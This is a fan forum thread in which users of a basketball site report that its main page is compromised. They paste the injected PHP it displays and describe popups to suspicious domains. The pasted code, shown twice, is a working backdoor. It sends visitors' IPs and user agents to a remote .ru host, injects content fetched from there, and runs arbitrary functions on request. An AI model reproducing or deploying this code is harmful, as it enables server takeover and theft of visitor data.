• Changing RCF's index page, please click on "Forums" to access the forums.

Hack or...something else?

Do Not Sell My Personal Information

Wrathe

Reverberate or you may not participate.
Joined
Jun 19, 2008
Messages
3,577
Reaction score
3,156
Points
113
Breaking this off of the redirect thread as that had an older date and want to make sure this gets read:

Upon hitting the main site, I receive:

if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;

When clicking forums, I receive a blank window popup w/ the following URL:

http:// googleframe.net/tijaq.cgi?19

More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.

As Blue would say, "Suspicioussssss!"

On further note, that googleframe URL, if you visit it's https version, you get a BS cert registered to: googleleadservices.cn

That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.

Hold me, I'm scared!
 
Last edited:
Dammit man! You know there are work rules against visiting porn sites on the company computer!
 
(!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
 
I got that at the top of the screen on the main url. realcavsfans.com
 
Yep I also get this as well as the popup when visiting the main page.
 
Im glad it just wasnt my computer. i thought i had a virus. My virus protector wouldnt let me access the site and i was getting a pop ad to something Ukraine website..
 

Rubber Rim Job Podcast Video

Episode 3-13: "Backup Bash Brothers"

Rubber Rim Job Podcast Spotify

Episode 3:11: "Clipping Bucks."
Top